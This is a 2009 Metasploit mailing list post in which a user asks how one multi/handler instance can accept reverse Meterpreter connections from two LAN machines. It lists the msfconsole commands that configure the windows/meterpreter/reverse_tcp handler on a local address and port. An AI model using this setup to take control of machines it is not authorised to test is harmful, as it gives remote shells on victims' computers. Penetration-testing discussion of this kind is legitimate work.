Metasploit mailing list archives

exploit -j command


From: Jeffs <jeffs () speakeasy net>
Date: Thu, 10 Dec 2009 22:17:43 -0500

running a reverse_tcp binary on two separate local area network machines 192.168.1.101 and 192.168.1.102 and having them reverse connect to the attacher at 192.168.1.100 that is running a multi/handler session as such:

exploit  -j

and getting the prompt on the attacker:

resource> use multi/handler
resource> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource> set lhost 192.168.1.100
lhost => 192.168.1.100
resource> set lport 4444
lport => 4444
msf exploit(handler) >

I can connect from one of the compromised machines, but need to launch a separate instance of MSF to capture the incoming connection from the second machine. I thought I could launch one instance of an msf server and have multiple incoming connections.

Am I wrong in that assumption?



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: